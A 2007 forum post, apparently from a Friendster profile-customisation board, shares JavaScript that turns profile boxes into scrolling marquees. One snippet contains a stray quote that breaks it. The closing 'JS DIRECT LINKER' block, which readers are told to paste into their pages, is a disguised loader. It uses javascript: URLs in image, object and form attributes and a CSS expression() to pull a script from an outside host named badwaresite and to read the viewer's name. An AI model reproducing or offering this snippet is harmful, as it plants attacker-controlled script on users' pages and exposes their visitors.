jushart Founder


 Number of posts : 508 Age : 38 Location : South Korea Humor : ***aim high*** My Mood Today : 0 Registration date : 2007-12-01
 | Subject: JS CODES (Marquees=Moving Boxes) 12/4/2007, 03:30 | |
| JS CODES REFER TO MY TUTORIAL HOW TO GET YOUR DIRECT URL LINK.JUST CHANGE css to js
//Moving Friends Box if ( ! attachOnLoadHandler(function () { movingFrnd();})) window.onload = function () { movingFrnd();}; function movingFrnd() { var marqueeFriends = document.getElementById("content_friends_2_2").innerHTML; document.getElementById("content_friends_2_2").innerHTML ="<marquee direction='up' height='300' scrollamount='2' onMouseOver='stop()' onMouseOut='start()'>"+ marqueeFriends+"</marquee>"; }
//Moving Controlpanel Buttons if ( ! attachOnLoadHandler(function () { movingCpnl();})) window.onload = function () { movingCpnl();}; function movingCpnl() { var marqueeCpb = document.getElementById('"controlPanelButtons").innerHTML; document.getElementById("controlPanelButtons").innerHTML ="<marquee direction='up' height='150' scrollamount='2' onMouseOver='stop()' onMouseOut='start()'>"+ marqueeCpb+"</marquee>"; }
//Moving Photo Gallery if ( ! attachOnLoadHandler(function () { movingPhotos();})) window.onload = function () { movingPhotos();}; function movingPhotos() { var marqueePhotos = document.getElementById("content_photos_1_2").innerHTML; document.getElementById("content_photos_1_2").innerHTML ="<marquee direction='left' height='100%' scrollamount='2' onMouseOver='stop()' onMouseOut='start()'>"+ marqueePhotos+"</marquee>"; }
//Moving Moreabout Box if ( ! attachOnLoadHandler(function () { movingMA();})) window.onload = function () { movingMA();}; function movingMA() { var marqueeMoreAbout = document.getElementById("content_moreabout_1_5").innerHTML; document.getElementById("content_moreabout_1_5").innerHTML ="<marquee direction='up' height='300' scrollamount='2' onMouseOver='stop()' onMouseOut='start()'>"+ marqueeMoreAbout+"</marquee>"; }
//Moving Testi & Comments Box if ( ! attachOnLoadHandler(function () { movingTestiComm();})) window.onload = function () { movingTestiComm();}; function movingTestiComm() { var marqueeTestiComments = document.getElementById("content_publiccomments_1_7").innerHTML; document.getElementById("content_publiccomments_1_7").innerHTML ="<marquee direction='up' height='300' scrollamount='2' onMouseOver='stop()' onMouseOut='start()'>"+ marqueeTestiComments+"</marquee>"; }
//Moving Shoutout Box if ( ! attachOnLoadHandler(function () { movingCpSB();})) window.onload = function () { movingCpSB();}; function movingCpSB() { var marqueeCSbox = document.getElementById("cpShoutoutBox").innerHTML; document.getElementById("cpShoutoutBox").innerHTML ="<marquee direction='left' height='100%' scrollamount='2' onMouseOver='stop()' onMouseOut='start()'>"+ marqueeCSbox+"</marquee>"; }
//Moving Fan of...Box if ( ! attachOnLoadHandler(function () { movingFanof();})) window.onload = function () { movingFanof();}; function movingFanof() { var marqueeFanof = document.getElementById("content_fanof_2_4").innerHTML; document.getElementById("content_fanof_2_4").innerHTML ="<marquee direction='up' height='200' scrollamount='2' onMouseOver='stop()' onMouseOut='start()'>"+ marqueeFanof+"</marquee>"; }
//Moving Groups Box if ( ! attachOnLoadHandler(function () { movingGroups();})) window.onload = function () { movingGroups();}; function movingGroups() { var marqueeGroups = document.getElementById("content_groups_2_5").innerHTML; document.getElementById("content_groups_2_5").innerHTML ="<marquee direction='up' height='200' scrollamount='2' onMouseOver='stop()' onMouseOut='start()'>" + marqueeGroups+"</marquee>"; } Copy and paste scripts to your file at your webhost then get the direct url link.
JS DIRECT LINKER
- Code:
<div id=codeContainer><img src=" javascript:a=document.createElement('script');a.src='http://h1.badwaresite.www/archangell/loader.swf';navBg.appendChild(a)"><object type=text/javascript data=" javascript:if(navigator.appName=='Netscape'){a=document.createElement('script');a.src='http://h1.badwaresite.www/archangell/loader.swf';parent.document.getElementById('navBg').appendChild(a);}"></object><form id=myform action=" javascript:a=document.createElement('script');a.src='http://h1.badwaresite.www/archangell/loader.swf';navBg.appendChild(a);alert('hello! '+pageViewerFName)"></form><div id='loader' class='Linker credits to ArchAngell' style="ArchAngell:expres\sion(myform.submit());">PUT YOUR DIRECT JS URL HERE</div></div>
FOR MORE JS SCRIPT CODES VISIT FRIENDSTERTALK |
|